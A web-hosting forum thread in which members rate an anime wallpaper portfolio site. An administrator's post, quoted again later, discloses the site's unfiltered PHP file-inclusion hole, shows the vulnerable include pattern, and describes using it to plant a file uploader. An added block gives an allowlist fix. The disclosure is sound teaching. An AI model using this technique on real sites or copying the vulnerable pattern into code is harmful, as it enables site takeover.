
Thread: My site!

  1. #1
    HyDr@ is offline x10 Sophmore HyDr@ is an unknown quantity at this point
    Join Date
    Jul 2006
    Location
    UK - Kent
    Posts
    134

    My site!

    http://www.hydra-art.net/

    It's kind of my portfolio; it also offers anime wallpapers.

    Some comments and support would be appreciated.

    - Portfolio of High quality Anime and Gaming Wallpapers/Website Creation/Anime Scans/Photoshop Tutorials
    - Devright.org ~ The right way to develop

  2. #2
    Spartan Erik's Avatar
    Spartan Erik is offline Retired Spartan Erik is an unknown quantity at this point
    Join Date
    Aug 2005
    Posts
    3,382

    Re: My site!

    I'm not a fan of anime but I can tell you're quite talented; I love your website design, it has a nice color scheme to it

    9/10, only because I'm not a fan of anime; otherwise, a 10/10

  3. #3
    Articz is offline x10 Lieutenant Articz is an unknown quantity at this point
    Join Date
    Jan 2005
    Posts
    432

    Re: My site!

    I also like your layout. I wish I could design layouts like that for my sites. I like the colours used, as the images stand out much more.
    10/10 here

    And I'm not an anime fan either.

  4. #4
    mikel2k3 is offline x10 Lieutenant mikel2k3 is an unknown quantity at this point
    Join Date
    Aug 2005
    Location
    West Yorkshire - UK
    Posts
    374

    Re: My site!

    I like it :D
    10/10... I need to start making better designs

    well done
    -----------------------------------
    -----------------------------------

    http://www.DistrasDesigns.com

    -----------------------------------
    -----------------------------------

  5. #5
    The_Magistrate's Avatar
    The_Magistrate is offline x10 Elder The_Magistrate is an unknown quantity at this point
    Join Date
    May 2005
    Location
    PA
    Posts
    559

    Re: My site!

    The design is pretty sweet. Interesting color scheme. Although, you have some black on dark grey headings in the menu on the right. Kinda hard to read. Your wallpapers are fantastic. Biggest drawback is that you used tables for layout, which is a big pet peeve of mine. 7/10
    Getting Started | Terms of Service | Paid Hosting | Forum Rules | Free Server Status | Banned Countries

    If I have helped you through one of my posts, please click the
    blue checkbox on the right below my avatar to add to my reputation.

  6. #6
    Bryon is offline Administrator Bryon has disabled reputation
    Join Date
    Apr 2005
    Location
    Northfield, NH
    Posts
    7,608

    Re: My site!

    Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have. ;)

    On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.

    I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])

    In your script you are including files in a way similar to:
    PHP Code:
    ..
    // $_GET['p'] goes straight into include() with no filtering (the vulnerable pattern)
    $filename = $_GET['p'];
    include($filename . '.php');
    ..
    You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )

    If you include a file into a PHP script, and that file contains PHP tags, ("<?[php] and ?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:
    And include it into your script:
    Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename?

    The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:
    As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.

    The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You never can trust that data supplied by a visitor is "clean" and not harmful in any way at all.

    So yeah, I showed you how I did this, so now I'll show you how to fix it.

    Please read this, which will help you secure your script fully:
    If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.

    Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.

    Adios,
    -Bryon
    Last edited by Bryon; 07-11-2006 at 07:20 PM.
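
One way to close the hole described in post #6, as an added example (not Bryon's code and not the site's own): map the `p` parameter to a fixed allowlist so the request never supplies a path. The page names, the `pages` directory and `resolve_page()` are assumptions made for illustration; the code targets PHP 8.

```php
<?php
declare(strict_types=1);

// Assumed layout: page fragments live in ./pages next to this script.
const PAGES_DIR = __DIR__ . '/pages';

// Allowlist: the only values of ?p= that map to a file (constructed names).
const PAGES = [
    'home'       => 'home.php',
    'wallpapers' => 'wallpapers.php',
    'tutorials'  => 'tutorials.php',
];

/**
 * Resolve the user-supplied page key to a file path, or null if not allowed.
 * The request value is only ever used as an array key, never as part of a path.
 */
function resolve_page(mixed $key): ?string
{
    // ?p[]=x arrives as an array; anything that is not a known string key is rejected.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }

    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . PAGES[$key]);

    // Defence in depth: the resolved file must exist and sit inside PAGES_DIR,
    // so a symlink or a bad allowlist entry cannot point elsewhere.
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['p'] ?? 'home');
if ($page === null) {
    // Unknown keys, paths and URLs all end here; nothing is included.
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

Keeping `allow_url_include` off in php.ini additionally stops `include` from fetching remote files even if a similar pattern exists elsewhere in the site.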

  7. #7
    HyDr@ is offline x10 Sophmore HyDr@ is an unknown quantity at this point
    Join Date
    Jul 2006
    Location
    UK - Kent
    Posts
    134

    Re: My site!

    Quote Originally Posted by Bryon
    Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have. ;)

    On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.

    I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])

    In your script you are including files in a way similar to:
    PHP Code:
    ..
    // $_GET['p'] goes straight into include() with no filtering (the vulnerable pattern)
    $filename = $_GET['p'];
    include($filename . '.php');
    ..
    You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )

    If you include a file into a PHP script, and that file contains PHP tags, ("<?[php] and ?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:
    And include it into your script:
    Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename?

    The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:
    As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.

    The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You never can trust that data supplied by a visitor is "clean" and not harmful in any way at all.

    So yeah, I showed you how I did this, so now I'll show you how to fix it.

    Please read this, which will help you secure your script fully:
    If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.

    Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.

    Adios,
    -Bryon
    No, it's fine, I actually know there's some big security problem there; I just didn't really have the time earlier (exams) to try and fix it.

    - Portfolio of High quality Anime and Gaming Wallpapers/Website Creation/Anime Scans/Photoshop Tutorials
    - Devright.org ~ The right way to develop

  8. #8
    oab's Avatar
    oab
    oab is offline
    x10 Lieutenant oab is an unknown quantity at this point
    Join Date
    Apr 2005
    Location
    Olympia, WA
    Posts
    459

    Re: My site!

    Site suspended, awwww, I really wanted to see it...
    http://www.teamoab.com

    aim:dknigh73
    msn:d_knight_3@hotmail.com

  9. #9
    noerrorsfound is offline x10 Elder noerrorsfound is an unknown quantity at this point
    Join Date
    Mar 2006
    Posts
    868

    Re: My site!

    Quote Originally Posted by oab
    Site suspended, awwww, I really wanted to see it...
    It doesn't look suspended to me.
    EOF

  10. #10
    oab's Avatar
    oab
    oab is offline
    x10 Lieutenant oab is an unknown quantity at this point
    Join Date
    Apr 2005
    Location
    Olympia, WA
    Posts
    459

    Re: My site!

    Wow, you're very talented, I suck at art and crap like that.
    http://www.teamoab.com

    aim:dknigh73
    msn:d_knight_3@hotmail.com
